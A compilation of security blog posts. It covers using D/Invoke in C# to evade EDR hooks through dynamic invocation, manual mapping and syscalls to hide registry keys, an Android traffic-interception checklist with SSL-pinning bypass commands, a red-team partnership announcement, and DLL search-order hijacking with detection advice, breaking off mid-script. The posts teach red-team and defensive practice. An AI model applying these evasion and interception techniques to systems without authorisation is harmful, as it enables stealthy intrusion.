IAT stands for Import Address Table, you could compare the IAT with a phone book. Every executable file has this phone book where it can look up the numbers of his/her friends (functions it needs).
This phonebook can be tampered with, an EDR could change an entry in this dictionary to point to it. Below you can see a nice diagram of how IAT hooking could work.
In order for this diagram to make sense, you’ll have to think of the EDR as “malicious code”:

In this example, a program that wants to call a message box. The program will look up the message box’s number (address) in his phone book so they can call it.
Little does the program know, that someone actually replaced the phone number (address) so whenever they call message box, they actually call the EDR instead!
The EDR will pick up the phone, listen to the message (function call), and if the EDR likes the message, will tell the program the real phone number of message box so the program can call message box.

Inline hooking could be compared with an intruder holding a gun to the head of the friend our program wants to call.

splicing illustration courtesy of “Learning malware Analysis” by Monnapa K A

With inline hooking, the program has the correct number (address) of its friend (function). The program will call its friend and its friend will answer the call.
Little does the program know, that its friend has actually been taken hostage and the call is on speaker. The intruder tells the friend what to say a certain phrase (execute some instructions) and afterward resume the conversation as if nothing happened.

These two methods can cause serious issues for operators (in the case of defensive hooks) and defenders (in the case of offensive hooks).
From an offensive perspective, there are some bypasses you can leverage to get around these function hooks. Firewalker by MDSec comes to mind and Sharpblock by @CCob. Or, the ultimate bypass. use system calls directly.

Another interesting project is the Sharpsploit project, aimed to be used as a library to facilitate offensive C# tradecraft, much like PowerSploit was for PowerShell back in the day. The downside of Sharpsploit however, is that the compiled dll is considered malicious, so if you use sharpsploit as a dependency for your program, you’ll immediately be screwed by AV.
Part of Sharpsploit however, is dynamic invocation (also known as D/invoke). This is (in my opinion) the most interesting part of the entire Sharpsploit suite. It allows operators to invoke API’s leveraged by P/Invoke, but instead of static imports, it does it dynamically! This means IAT hooking is completely bypassed since dynamically invoking functions will not create an entry in the executables import table. As a result analysts and EDR’s alike will not be able to tell what your majestic program does, just by looking at your import table. TheWover wrote a very nice blog post about it, I highly recommend reading it.

Additionally, a NuGet package was released by TheWover and what is great about this NuGet package is that it can be directly used as a library and is NOT considered malicious. The cool thing about this package is that it contains structures and functions that would otherwise have to be manually defined by the programmer. If this does not make sense to you right now, allow me to illustrate with an example I created a few days ago:

Then, I recreated the same PoC, with the NuGet

The codebase shrunk from 731 lines of code to just 38. That is what makes the D/Invoke NuGet the best invention ever for offensive .NET development.
The NuGet is still a work in process, but its ultimate goal is to be a full replacement for P/Invoke. If you want to help out, feel free to submit a pull request!

I’m confident that this library can become very big, through the power of open source!

Leveraging D/Invoke to bypass hooks and the revival of the invisible reg key.

Now that the concepts of hooking and dynamic invocation are clear, we can dive into bypassing hooks using D/Invoke.
For inspiration and to make this blog post useful, I’ve decided to create a proof of concept based on some old research from the folks over at Specterops.
In their research, they took even older research of Mark Russinovich and turned it into an offensive proof of concept. Mark released a tool called RegHide back in 2005.
He discovered that you could prepend a null byte when creating a new registry key using Ntcreatekey. When a null byte prepends the registry key, the interpreter sees this as a string termination (in C, strings get terminated with a null byte). This results in the registry accepting the new reg key, but unable to display it properly. This gives defenders already a nice indication something is definitely fishy.

Image for post
Regedit will show an error when trying to display a key value with a null character in its name.

In my proof of concept, I ported their PowerShell into C#, leveraging the power of D/invoke and its NuGet.
I’ve submitted a pull request for the D/invoke project, where I added all the necessary structures and delegates (along with some others, such as QueueUserAPC process injection).
However, as I wanted to create this blogpost already, I actually coded the necessary structs into my PoC as well. making it compatible with the current NuGet package of D/invoke.
The PoC can be found here:

usage of the PoC – DinvisbleRegistry

There are three methods of invocation coded into the PoC, all the methods are fully implemented even though they could have been merged into one big function.
The reason why I took the time to write the code to its fullest, is because I wanted to show the concepts behind the different approaches an operator can take to leverage D/Invoke to bypass hooking.

Method 1: “classic” dynamic invoke.

When specifying the -n flag and all other required parameters the PoC will create a new (hidden, if you use the -h flag) registry key in the requested hive using the traditional D/Invoke methodology.
This method will bypass IAT hooking as the functions are being called dynamically, thus not showing up in the IAT.

D/Invoke works like this, you first need to create the signature of the API call you are trying to do (unless it’s already in the D/Invoke Nuget) and the corresponding Delegate function:

API signature

public static DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
object[] funcargs =
DInvoke.Data.Native.NTSTATUS retvalue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.DynamicAPIInvoke(@"ntdll.dll", @"NtOpenKey", typeof(DELEGATES.NtOpenKey), ref funcargs);
keyHandle = (IntPtr)funcargs[0];
return retvalue;

Corresponding delegate:

public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

As you can see in the API signature, you are calling the DynamicAPIInvoke function and passing it the delegate of the function.

Method 2: “Manual Mapping”

A trick some threat actors and malware strains use is the concept of manual mapping. TheWover explains manual mapping in his blog post as follows:

DInvoke supports manual mapping of PE modules, stored either on disk or in memory. This capability can be used either for bypassing API hooking or simply to load and execute payloads from memory without touching disk. The module may either be mapped into dynamically allocated memory or into memory backed by an arbitrary file on disk. When a module is manually mapped from disk, a fresh copy of it is used. That way, any hooks that AV/EDR would normally place within it will not be present. If the manually mapped module makes calls into other modules that are hooked, then AV/EDR may still trigger. But at least all calls into the manually mapped module itself will not be caught in any hooks. This is why malware often manually maps ntdll.dll. They use a fresh copy to bypass any hooks placed within the original copy of ntdll.dll loaded into the process when it was created, and force themselves to only use Nt* API calls located within that fresh copy of ntdll.dll. Since the Nt* API calls in ntdll.dll are merely wrappers for syscalls, any call into them will not inadvertently jump into other modules that may have hooks in place

Manual mapping is done in the PoC when you specify the -m flag and the code looks like this

First, map the library you are using, the lower you go, the less chance of hooks further down the call tree. Whenever you can use ntdll.dll.

DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = new DInvoke.Data.PE.PE_MANUAL_MAP();
mappedDLL = DInvoke.ManualMap.Map.MapModuleToMemory(@"C:\Windows\System32\ntdll.dll");

Next, create the delegate for the function you are trying to call, if it is not yet in D/Invoke, else you can just leverage the NuGet.

public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

Next, create your function parameters and an array to store them in

IntPtr keyHandle = IntPtr.Zero;
oa.Length = Marshal.SizeOf(oa);             
oa.Attributes = (uint)STRUCTS.OBJ_ATTRIBUTES.CASE_INSENSITIVE;             
oa.objectName = oaObjectName;             
oa.SecurityDescriptor = IntPtr.Zero;           
oa.SecurityQualityOfService = IntPtr.Zero;            
DInvoke.Data.Native.NTSTATUS retValue = new DInvoke.Data.Native.NTSTATUS();
object[] ntOpenKeyParams =

Finally, call D/invokes CallMappedDLLModuleExport to call the function from the manually mapped DLL.

retValue = (DInvoke.Data.Native.NTSTATUS)DInvoke.DynamicInvoke.Generic.CallMappedDLLModuleExport(mappedDLL.PEINFO, mappedDLL.ModuleBase, "NtOpenKey", typeof(DELEGATES.NtOpenKey), ntOpenKeyParams, false);

In the case of ntdll, the last parameter of CalledMappedDLLModuleExport is false, this is because ntdll does not have a DllMain method. Setting it to true would cause panic as you are trying to access memory that does not exist, crashing the program.

Method 3: OverloadMapping (my personal favorite)

TheWover explains Overloadmapping as follows:

In addition to normal manual mapping, we also added support for Module Overloading. Module Overloading allows you to store a payload in memory (in a byte array) into memory backed by a legitimate file on disk. That way, when you execute code from it, the code will appear to execute from a legitimate, validly signed DLL on disk.
A word of caution: manual mapping is complex and we do not guarantee that our implementation covers every edge case. The version we have implemented now is serviceable for many common use cases and will be improved upon over time. Additionally, manual mapping and syscall stub generation do not currently work in WOW64 processes.

Method 2 and 3 are largely the same in implementation, the only variation is you call the overload manual map method, and you do not have to map to memory anymore

        DInvoke.Data.PE.PE_MANUAL_MAP mappedDLL = DInvoke.ManualMap.Overload.OverloadModule(@"C:\Windows\System32\ntdll.dll");

The rest of the implementation remains the same as in method 2.

If you want to see which process got used you can get it using the PE_MANUAL_MAP DecoyModule call:

Console.WriteLine("Decoy module is found!\n Using: {0} as a decoy", mappedDLL.DecoyModule);

Method 4: System calls

Disclaimer: This method is currently a bit “broken”, as a result, you might not experience the result you are looking for. This is also the reason why this method is currently NOT implemented in the PoC I would advise not using this method until a later release of D/Invoke.

D/Invoke has provided an API to dynamically get system calls as well. The steps to generate system calls are explained next.

Create your delegate (should it not already exist):

public delegate DInvoke.Data.Native.NTSTATUS NtOpenKey(
ref IntPtr keyHandle,
ref STRUCTS.OBJECT_ATTRIBUTES objectAttributes);

Create a IntPtr to store your syscall pointer and fill in the pointer using the GetSyscallStub function

IntPtr syscall = IntPtr.Zero;
syscall  = DInvoke.DynamicInvoke.Generic.GetSyscallStub("NtOpenKey");

Create a delegate of the call you want to make that uses the syscall through the use of our dear friend Marshal

DELEGATES.NtOpenKey syscallNtOpenKey = (DELEGATES.NtOpenKey)Marshal.GetDelegateForFunctionPointer(syscall, typeof(DELEGATES.NtOpenKey));

Finally, make the call 🙂

retValue = syscallNtOpenKey(ref keyHandle, desiredAccess, ref oa);


I hope this blogpost has shed some light on the different approaches an operator could take in order to bypass EDR hooks for both IAT and inline hooking.
Feel free to contribute to the D/Invoke project by submitting a pull request! We will greatly appreciate your efforts! The D/Invoke GitHub project can be found here:
The proof of concept can be found here:

About the author

Jean-François Maes is a red teaming and social engineering expert working in the NVISO Cyber Resilience team. 
When he is not working, you can probably find Jean-François in the Gym or conducting research.
Apart from his work with NVISO, he is also the creator of redteamer.tips, a website dedicated to help red teamers.
Jean-François is currently also in the process of becoming a SANS instructor for the SANS SEC699: Purple Team Tactics – Adversary Emulation for Breach Prevention & Detection course
He was also ranked #1 on the Belgian leaderboard of Hack The Box (a popular penetration testing platform).
You can find Jean-François on LinkedIn , Twitter , GitHub and on Hack The Box.

Proxying Android app traffic – Common issues / checklist

19 November 2020 at 09:52

During a mobile assessment, there will typically be two sub-assessments: The mobile frontend, and the backend API. In order to examine the security of the API, you will either need extensive documentation such as Swagger or Postman files, or you can let the mobile application generate all the traffic for you and simply intercept and modify traffic through a proxy (MitM attack).

Sometimes it’s really easy to get your proxy set up. Other times, it can be very difficult and time consuming. During many engagements, I have seen myself go over this ‘sanity checklist’ to figure out which step went wrong, so I wanted to write it down and share it with everyone.

In this guide, I will use PortSwigger’s Burp Suite proxy, but the same steps can of course be used with any HTTP proxy. The proxy will be hosted at on port 8080 in all the examples. The checks start very basic, but ramp up towards the end.


Update: Sven Schleier also created a blogpost on this with some awesome visuals and graphs, so check that out as well!

Setting up the device

First, we need to make sure everything is set up correctly on the device. These steps apply regardless of the application you’re trying to MitM.

Is your proxy configured on the device?

An obvious first step is to configure a proxy on the device. The UI changes a bit depending on your Android version, but it shouldn’t be too hard to find.

Sanity check
Go to Settings > Connections > Wi-Fi, select the Wi-Fi network that you’re on, click Advanced > Proxy > Manual and enter your Proxy details:

Proxy host name:
Proxy port: 8080

Is Burp listening on all interfaces?

By default, Burp only listens on the local interface ( but since we want to connect from a different device, Burp needs to listen on the specific interface that has joined the Wi-Fi network. You can either listen on all interfaces, or listen on a specific interface if you know which one you want. As a sanity check, I usually go for ‘listen on all interfaces’. Note that Burp has an API which may allow other people on the same Wi-Fi network to query your proxy and retrieve information from it.

Sanity check
Navigate to on your host computer. The Burp welcome screen should come up.

In Burp, go to Proxy > Options > Click your proxy in the Proxy Listeners window > check ‘All interfaces’ on the Bind to Address configuration

Can your device connect to your proxy?

Some networks have host/client isolation and won’t allow clients to talk to each other. In this case, your device won’t be able to connect to the proxy since the router doesn’t allow it.

Sanity Check
Open a browser on the device and navigate to . You should see Burp’s welcome screen. You should also be able to navigate to http://burp in case you’ve already configured the proxy in the previous check.

There are a few options here:

  • Set up a custom wireless network where host/client isolation is disabled
  • Host your proxy on a device that is accessible, for example an AWS ec2 instance
  • Perform an ARP spoofing attack to trick the mobile device into believing you are the router
  • Use adb reverse to proxy your traffic over a USB cable:
    • Configure the proxy on your device to go to on port 8080
    • Connect your device over USB and make sure that adb devices shows your device
    • Execute adb reverse tcp:8080 tcp:8080 which sends all traffic received on <device>:8080 to <host>:8080
    • At this point, you should be able to browse to and see Burp’s welcome screen

Can you proxy HTTP traffic?

The steps for HTTP traffic are typically much easier than HTTPS traffic, so a quick sanity check here makes sure that your proxy is set up correctly and reachable by the device.

Sanity check
Navigate to http://neverssl.com and make sure you see the request in Burp. Neverssl.com is a website that doesn’t use HSTS and will never send you to an HTTPS version, making it a perfect test for plaintext traffic.


  • Go over the previous checks again, something may be wrong
  • Burp’s Intercept is enabled and the request is waiting for your approval

Is your Burp certificate installed on the device?

In order to intercept HTTPS traffic, your proxy’s certificate needs to be installed on the device.

Sanity check
Go to Settings > Security > Trusted credentials > User and make sure your certificate is listed. Alternatively, you can try intercepting HTTPS traffic from the device’s browser.

This is documented in many places, but here’s a quick rundown:

  • Navigate to http://burp in your browser
  • Click the ‘CA Certificate’ in the top right; a download will start
  • Use adb or a file manager to change the extension from der to crt
    • adb shell mv /sdcard/Download/cacert.der /sdcard/Download/cacert.crt
  • Navigate to the file using your file manager and open the file to start the installation

Is your Burp certificate installed as a root certificate?

Applications on more recent versions of Android don’t trust user certificates by default. A more thorough writeup is available in another blogpost. Alternatively, you can repackage applications to add the relevant controls to the network_security_policy.xml file, but having your root CA in the system CA store will save you a headache on other steps (such as third-party frameworks) so it’s my preferred method.

Sanity check
Go to Settings > Security > Trusted credentials > System and make sure your certificate is listed.

In order to get your certificate listed as a root certificate, your device needs to be rooted with Magisk

  • Install the client certificate as normal (see previous check)
  • Install the MagiskTrustUser module
  • Restart your device to enable the module
  • Restart a second time to trigger the file copy

Alternatively, you can:

  • Make sure the certificate is in the correct format and copy/paste it to the /system/etc/security/cacerts directory yourself. However, for this to work, your /system partition needs to be writable. Some rooting methods allow this, but it’s very dirty and Magisk is just so much nicer. It’s also a bit tedious to get the certificate in the correct format.
  • Modify the networkSecurityConfig to include user certificates as trust anchors (see further down below). It’s much nicer to have your certificate as a system certificate though, so I rarely take this approach.

Does your Burp certificate have an appropriate lifetime?

Google (and thus Android) is aggressively shortening the maximum accepted lifetime of leaf certificates. If your leaf certificate’s expiration date is too far ahead in the future, Android/Chrome will not accept it. More information can be found in this blogpost.

Sanity check
Connect to your proxy using a browser and investigate the certificate lifetime of both the root CA and the leaf certificate. If they’re shorter than 1 year, you’re good to go. If they’re longer, I like to play it safe and create a new CA. You can also use the latest version of the Chrome browser on Android to validate your certificate lifetime. If something’s wrong, Chrome will display the following error: ERR_CERT_VALIDITY_TOO_LONG

There are two possible solutions here:

  • Make sure you have the latest version of Burp installed, which reduces the lifetime of generated leaf certificates
  • Make your own root CA that’s only valid for 365 days. Certificates generated by this root CA will also be shorter than 365 days. This is my preferred option, since the certificate can be shared with team members and be installed on all devices used during engagements.

Setting up the application

Now that the device is ready to go, it’s time to take a look at application specifics.

Is the application proxy aware?

Many applications simply ignore the proxy settings of the system. Applications that use standard libraries will typically use the system proxy settings, but applications that rely on interpreted language (such as Xamarin and Unity) or are compiled natively (such as Flutter) usually require the developer to explicitly program proxy support into the application.

Sanity check
When running the application, you should either see your HTTPS data in Burp’s Proxy tab, or you should see HTTPS connection errors in Burp’s Event log on the Dashboard panel. Since the entire device is proxied, you will see many blocked requests from applications that use SSL Pinning (e.g. Google Play), so see if you can find a domain that is related to the application. If you don’t see any relevant failed connections, your application is most likely proxy unaware.

As an additional sanity check, you can see if the application uses a third party framework. If the app is written in Flutter it will definitely be proxy unaware, while if it’s written in Xamarin or Unity, there’s a good chance it will ignore the system’s proxy settings.

  • Decompile with apktool
    • apktool d myapp.apk
  • Go through known locations
    • Flutter: myapp/lib/arm64-v8a/libflutter.so
    • Xamarin: myapp/unknown/assemblies/Mono.Android.dll
    • Unity: myapp/lib/arm64-v8a/libunity.so

There are a few things to try:

  • Use ProxyDroid (root only). Although it’s an old app, it still works really well. ProxyDroid uses iptables in order to forcefully redirect traffic to your proxy
  • Set up a custom hotspot through a second wireless interface and use iptables to redirect traffic yourself. You can find the setup on the mitmproxy documentation, which is another useful HTTP proxy. The exact same setup works with Burp.

In both cases, you have moved from a ‘proxy aware’ to a ‘transparent proxy’ setup. There are two things you must do:

  • Disable the proxy on your device. If you don’t do this, Burp will receive both proxied and transparent requests, which are not compatible with each other.
  • Configure Burp to support transparent proxying via Proxy > Options > active proxy > edit > Request Handling > Support invisible proxying

Perform the sanity check again to now hopefully see SSL errors in Burp’s event log.

Is the application using custom ports?

This only really applies if your application is not proxy aware. In that case, you (or ProxyDroid) will be using iptables to intercept traffic, but these iptables rules only target specific ports. In the ProxyDroid source code, you can see that only ports 80 (HTTP) and 443 (HTTPS) are targeted. If the application uses a non-standard port (for example 8443 or 8080), it won’t be intercepted.

Sanity check
This one is a bit more tricky. We need to find traffic that is leaving the application that isn’t going to ports 80 or 443. The best way to do this is to listen for all traffic leaving the application. We can do this using tcpdump on the device, or on the host machine in case you are working with a second Wi-Fi hotspot.

Run the following command on an adb shell with root privileges:

tcpdump -i wlan0 -n -s0 -v

You will see many different connections. Ideally, you should start the command, open the app and stop tcpdump as soon as you know the application has made some requests. After some time, you will see connections to a remote host with a non-default port. In the example below, there are multiple connections to on port 8088:

Alternatively, you can send the output of tcpdump to a pcap by using tcpdump -i wlan0 -n -s0 -w /sdcard/output.pcap. After retrieving the output.pcap file from the device, it can be opened with WireShark and inspected:


If your application is indeed proxy unaware and communicating over custom ports, ProxyDroid won’t be able to help you. ProxyDroid doesn’t allow you to add custom ports, though it is an open-source project and a PR for this would be great 😉. This means you’ll have to use iptables manually.

  • Either you set up a second hotspot where your host machine acts as the router, and you can thus perform a MitM
  • Or you use ARP spoofing to perform an active MitM between the router and the device
  • Or you can use iptables yourself and forward all the traffic to Burp. Since Burp is listening on a separate host, the nicest solution is to use adb reverse to map a port on the device to your Burp instance. This way you don’t need to set up a separate hotspot, you just need to connect your device over USB.
    • On host: adb reverse tcp:8080 tcp:8080
    • On device, as root: iptables -t nat -A OUTPUT -p tcp -m tcp --dport 8088 -j REDIRECT --to-ports 8080

Is the application using SSL pinning?

At this point, you should be getting HTTPS connection failures in Burp’s Event log dashboard. The next step is to verify if SSL pinning is used, and disable it. Although many Frida scripts claim to be universal root bypasses, there isn’t a single one that even comes close. Android applications can be written in many different technologies, and only a few of those technologies are typically supported. Below you can find various ways in which SSL pinning may be implemented, and ways to get around it.

Note that some applications have multiple ways to pin a specific domain, and you may have to combine scripts in order to disable all of the SSL pinning.

Pinning through android:networkSecurityConfig

Android allows applications to perform SSL pinning by using the network_security_config.xml file. This file is referenced in the AndroidManifext.xml and is located in res/xml/. The name is usually network_security_config.xml but it doesn’t have to be. As an example application, the Microsoft Authenticator app has the following two pins defined:

Use any of the normal universal bypass scripts:

  • Run Objection and execute the android sslpinning disable command
  • Use Frida codeshare: frida -U --codeshare akabe1/frida-multiple-unpinning -f be.nviso.app
  • Remove the networkSecurityConfig setting in the AndroidManifest by using apktool d and apktool b. Usually much faster to do it through Frida and only rarely needed.

Pinning through OkHttp

Another popular way of pinning domains is through the OkHttp library. You can do a quick validation by grepping for OkHttp and/or sha256. You will most likely find references (or even hashes) relating to OkHttp and whatever is being pinned:

Use any of the normal universal bypass scripts:

  • Run Objection and execute the android sslpinning disable command
  • Use Frida codeshare: frida -U --codeshare akabe1/frida-multiple-unpinning -f be.nviso.app
  • Decompile the apk using apktool, and modify the pinned domains. By default, OkHttp will allow connections that are not specifically pinned. So if you can find and modify the domain name that is pinned, the pinning will be disabled. Using Frida is much faster though, so this approach is rarely taken.

Pinning through OkHttp in obfuscated apps

Universal pinning scripts may work on obfuscated applications since they hook on Android libraries which can’t be obfuscated. However, if an application is using something else than a default Android Library, the classes will be obfuscated and the scripts will fail to find the correct classes. A good example of this is OkHttp. When an application is using OkHttp and has been obfuscated, you’ll have to figure out the obfuscated name of the CertificatePinner.Builder class. You can see below that obfuscated OkHttp was used by searching on the same sha256 string. This time, you won’t see nice OkHttp class references, but you will typically still find string references and maybe some package names as well. This depends on the level of obfuscation of course.

You’ll have to write your own Frida script to hook the obfuscated version of the CertificatePinner.Builder class. I have written down the steps to easily find the correct method, and create a custom Frida script in this blogpost.

Pinning through various libraries

Instead of using the networkSecurityConfig or OkHttp, developers can also perform SSL pinning using many different standard Java classes or imported libraries. Additionally, some Java based third party app such as the PhoneGap or AppCelerator frameworks provide specific functions to the developer to add pinning to the application.

There are many ways to do it programmatically, so your best bet is to just try various anti-pinning scripts and at least figure out what kind of methods are being triggered so that you have information on the app, after which you may be able to further reverse-engineer the app to figure out why interception isn’t working yet.

Try as many SSL pinning scripts you can find, and monitor their output. If you can identify certain classes or frameworks that are used, this will help you in creating your own custom SSL pinning bypasses specific for the application.

Pinning in third party app frameworks

Third party app frameworks will have their own low-level implementation for TLS and HTTP and default pinning bypass scripts won’t work. If the app is written in Flutter, Xamarin or Unity, you’ll need to do some manual reverse engineering.

Figuring out if a third party app framework is used
As mentioned in a previous step, the following files are giveaways for either Flutter, Xamarin or Unity:

  • Flutter: myapp/lib/arm64-v8a/libflutter.so
  • Xamarin: myapp/unknown/assemblies/Mono.Android.dll
  • Unity: myapp/lib/arm64-v8a/libunity.so

Pinning in Flutter applications

Flutter is proxy-unaware and doesn’t use the system’s CA store. Every Flutter app contains a full copy of trusted CAs which is used to validate connections. So while it most likely isn’t performing SSL pinning, it still won’t trust the root CA’s on your device and thus interception will not be possible. More information is available in the blogposts mentioned below.

Follow my blog post for either ARMv7 (x86) or ARMv64 (x64)

Pinning in Xamarin and Unity applications

Xamarin/Unity applications usually aren’t too difficult, but they do require manual reverse engineering and patching. Xamarin/Unity applications contain .dll files in the assemblies/ folder and these can be opened using .NET decompilers. My favorite tool is DNSpy which also allows you to modify the dll files.

No blog post on this yet, sorry 😉. The steps are as follows:

  • Extract apk using apktool and locate .dll files
  • Open .dll files using DNSpy and locate HTTP pinning logic
  • Modify logic either by modifying the C# code or the IL
  • Save the modified module
  • Overwrite the .dll file with the modified version
  • Repackage and resign the application
  • Reinstall the application and run

What if you still can’t intercept traffic?

It’s definitely possible that after all of these steps, you still won’t be able to intercept all the traffic. The typical culprits:

  • Non-HTTP protocols (we’re only using an HTTP proxy, so non-HTTP protocols won’t be intercepted)
  • Very heavy obfuscation
  • Anti-tampering controls

You will usually see these features in either mobile games or financial applications. At this point, you’ll have to reverse engineer the application and write your own Frida scripts. This can be an incredibly difficult and time consuming process, and a step-by-step guide such as this will never be able to help you there. But that, of course, is where the fun begins 😎.

About the author


Jeroen Beckers is a mobile security expert working in the NVISO Cyber Resilience team. He is a SANS instructor and SANS lead author of the SEC575 course. Jeroen is also a co-author of OWASP Mobile Security Testing Guide (MSTG) and the OWASP Mobile Application Security Verification Standard (MASVS). He loves to both program and reverse engineer stuff. You can find Jeroen on LinkedIn.

NVISO and QuoIntelligence Announce Strategic Cooperation

30 October 2020 at 10:51

We are pleased to announce that we have created a unique approach with QuoIntelligence GmbH in responding to the TIBER-EU testing. Using our approach, we combine both passive threat intelligence gathering and active offensive red team testing as one seamless experience while remaining independent from each other.  

The TIBER-EU Framework, More Critical Now Than Ever 

The constant evolution of the cyber threat landscape combined with the recent acceleration of the financial sector’s digital transformation, led by new global challenges such as the COVID-19 pandemic, brings new complex cyber threats using more advanced methods and techniques. Financial institutions can better face these evolving threats and aim to reach a more secure digital environment by putting in place the right cyber and operational resilience strategies early on. 

In order to test and improve the cyber resilience of financial institutions, the European Central Bank developed a framework for ‘Threat Intelligence Based Ethical Red Teaming’, commonly known as TIBER-EU framework, to carry out a controlled cyberattack based on real-life threat scenarios. TIBER-EU exercises are designed for entities which are part of the core financial infrastructure at the national or European level.

“It is the first EU-wide guide on how authorities, entities, threat intelligence and red-team providers should work together to test and improve the cyber resilience of entities by carrying out a controlled cyberattack.”  – Fiona van Echelpoel, Deputy Director General at ECB 

By conducting a TIBER-EU test, institutions can enhance their cyber and operational resilience and operational resilience by focusing on technology, monitoring and human awareness strengths & weaknesses before they are exploited by real-life threat actors. The exercise’s main objective is to test and improve protection, detection, and response capabilities against sophisticated cyber threats. Having a TIBER-EU test implemented, European organizations will then be able to reduce the impact of potential cyberattacks.

Source: Lessons Learned and Evolving Practices of the TIBER Framework

Benefits for European Organizations 

Since the TIBER-EU testing process can be quite overwhelming for the testing entities, selecting the right qualified providers is the first step towards a successful experience and resourceful outcome. The combined work and fluent integrations and communications between the Threat Intelligence and Red Teaming providers is crucial to implement optimal strategies tailored to the testing entity’s cyber strength and weaknesses. 

For this reason, we at NVISO are cooperating with QuoIntelligence GmbH, a German Threat Intelligence provider supporting decision-makers with customized and actionable intelligence reports,, to facilitate the cyber resilience testing process. Within this approach, QuoIntelligence first looks at the range of possible threats, selects the most applicable threat actors likely to target the entity, and creates a customized Targeted Threat Intelligence Report which lays the foundation for the Red Teaming’s attack scenarios. Then, NVISO, as the Red Teaming provider, carries out the simulated attack and attempts to compromise the critical functions of the entity by mimicking one of the real-life threat actors in scope.

In cooperation with QuoIntelligence, we already implemented effective joint processes and offer a seamless experience between the Threat Intelligence and Red Teaming providers. Organizations can then take the worry out of the process and be led by experienced providers. 


Cybersecurity risks are becoming harder to assess and interpret due to the growing complexity of the threat landscape, adversarial ecosystem, and expansion of the attack surface.

“The expansion of knowledge and expertise in cybersecurity is crucial to improve preparedness and resilience. The EU should continue building capacity through the investment in cybersecurity training programs, professional certification, exercises and awareness campaigns.”  – ENISA Threat Landscape Report 2020 

In order to test and improve the cyber resilience of the European financial sector, the European Central Bank has put in place the TIBER-EU framework involving a close collaboration between a Threat Intelligence provider and a Red Teaming provider.

QuoIntelligence and NVISO are now offering a strategic approach to simplify the TIBER-EU testing process and offer a worry-free experience to European organizations that want to take their cyber and operational resilience to the next level.

Authors and contact

In case of questions and for more information, please contact [email protected].

This article was written by Marina Hirschberger, Senior Security Consultant, in accordance with Jonas Bauters, Solution Lead for Red Teaming at NVISO and in cooperation with Iris Fernandez , Marketing Expert at QuoIntelligence GmbH.

MITRE ATT&CK turned purple – Part 1: Hijack execution flow

6 October 2020 at 10:42

The MITRE ATT&CK framework is probably the most well-known framework in terms of adversary emulation and by extent, red teaming.
It features numerous TTPs (Tactics, Techniques, and Procedures) and maps them to threat actors. Being familiar with this framework is not only benefiting the red team operations but the blue team operations as well! To create the most secure environment for your enterprise, it is imperative that you know what threat actors are using and how to defend against it.

Having a 100% coverage of MITRE ATT&CK is probably not feasible, by choosing which TTPs are most relevant for your environment however, you can start setting up baseline defenses and expand from there. This will help you mature your enterprise’s security posture significantly. We at NVISO are using the framework in our daily operations and have therefore decided it was time to combine the knowledge we have in-house from both our blue and red teams to provide insight into how these techniques can be leveraged from an offensive point of view AND how to prevent (or at least detect) the technique from a defensive point of view. In our first blogpost of the series, we decided to cover T1574 – Hijack execution flow.

Offensive point of view: Leveraging execution flow hijacking in red team engagements and threat emulations

Execution flow hijacking usually boils down to the following: identifying a binary present on the system that is missing dependencies (typically a DLL) and providing said missing dependency. Luckily for us, the good people at Microsoft have gifted us with a tool suite called sysinternals, which we will happily leverage to identify missing dependencies.

It should be noted that casually dropping sysinternals tools on a target environment is very poor operational security and probably won’t do you much good anyway. For most of the tooling (if not all), you will need to have administrative privilege on the machine you are running it from. Therefore it is much more interesting to either have some “educated” knowledge beforehand on what tools are living on your targeted environment. Alternatively (and simpler), you can hijack a program you know will most likely be installed. Some fine examples of this would be Teams, Chrome, Firefox, …

We can identify missing dependencies using a tool that was created by our friends over at SpectreOps called “DLLHijackTest”. This tool needs an extract from sysinternals’ Process Monitor and will attempt to verify if the processes identified are indeed hijackable, as not all missing DLLs are getting loaded in the same way (calling DLLMain) at execution time.

Let’s identify some nice missing dependencies on our trusted Internet Explorer using the following Process Monitor filter:

After this filter is applied, let’s open Internet Explorer and check our process monitor light up like a Christmas tree:

Now we can export this as a CSV file by going to file -> save and choosing CSV as an output format.

Everything we need now is a valid hijack, which we can test using the aforementioned PowerShell script from SpectreOps:

Get-PotentialDLLHijack -CSVPath "G:\testzone\DLLHijackTest-master\InternetExplorer\IE.CSV" -MaliciousDLLPath "G:\testzone\DLLHijackTest-master\x64\Release\DLLHijackTest.dll" -ProcessPath "C:\Program Files\Internet Explorer\iexplore.exe"

What happens now is the following chain of steps:

  • A DLL gets dropped in the location of the application and is named after a missing dependency
  • The process gets launched
  • If the DLLMain method is called, the DLL will write its own path into an arbitrary location that you need to replace in the source code of the SpectreOps project.
  • The process terminates

This repeats until the entire CSV is parsed. If the application has a vulnerable Hijack, an output file will be created at the location you hardcoded.

In the case of Internet Explorer this is indeed the case:

We have successfully fuzzed Internet Explorer and identified four missing DLLs that are in fact loaded and their DLLMain is executed.

Note: for this blogpost, IE was chosen as a PoC. You will need admin rights to write in C:\Program Files\ so for red team ops, this is a pretty weak candidate, unless you will abuse this for persistence reasons.

Now all that is left to do is create a DLL that executes your payload, name it one of the missing dependencies identified in the results file and drop it on disk.
Every time Internet Explorer will be opened, your DLL payload will fire.

Defensive point of view: Preventing and detecting execution flow Hijacks

When looking through the public Sigma repository, it is noticeable how only a few rules to detect this technique exist:
Some 20 exist, of which two are authored by NVISO: Maxime Thiebaut’s “Windows Registry Persistence COM Search Order Hijacking”, and Bart Parys and yours truly’s “Fax Service DLL Search Order Hijack”. All of these only cover specific instances of this technique. The reason for this is very simply that it is next to impossible to write a rule that covers the many options the red team/adversary has to exploit this technique. Proper detection is achievable however, by getting a baseline of your environment and alerting on any DLLs/EXEs loaded from unexpected locations.

While Sysmon can be configured to log ImageLoaded events as event ID 7, this is disabled by default because of the massive amount of logs it would generate.
To help with triaging you can use a PowerShell script to semi-automatically generate a Sysmon config that excludes all known-good DLLs that are loaded.
See the example below for one such (basic) PowerShell script:

# Run this script repeatedly to automatically add the newly used DLLs to the exclusions.
# Do a reboot after installing the "base" Sysmon config to log all the DLLs loaded in the Windows boot process.

# Modify to point to the Sysmon executable.
